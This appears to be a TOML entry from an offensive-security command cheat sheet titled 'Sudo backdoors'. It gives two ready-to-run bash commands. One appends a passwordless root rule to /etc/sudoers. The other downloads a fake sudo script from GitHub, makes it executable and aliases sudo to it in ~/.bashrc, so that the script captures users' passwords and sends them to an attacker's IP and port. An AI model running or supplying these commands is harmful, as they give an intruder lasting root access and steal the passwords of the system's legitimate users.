title = "Sudo backdoors"
description = ""
tags = ["linux", "backdoor", "sudo"]
source = ["https://github.com/nisay759/sudo-backdoor"]

[[data]]
description = "Add your unprivileged user to sudoers (substitute <USER>) (root required). This will give you permission to run any command as root with sudo."
language = "bash"
command = """echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers"""

[[data]]
description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading sudo.sh, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:"
language = "bash"
command = """#Change /tmp/sudo if needed
wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo
chmod +x /tmp/sudo
echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc"""
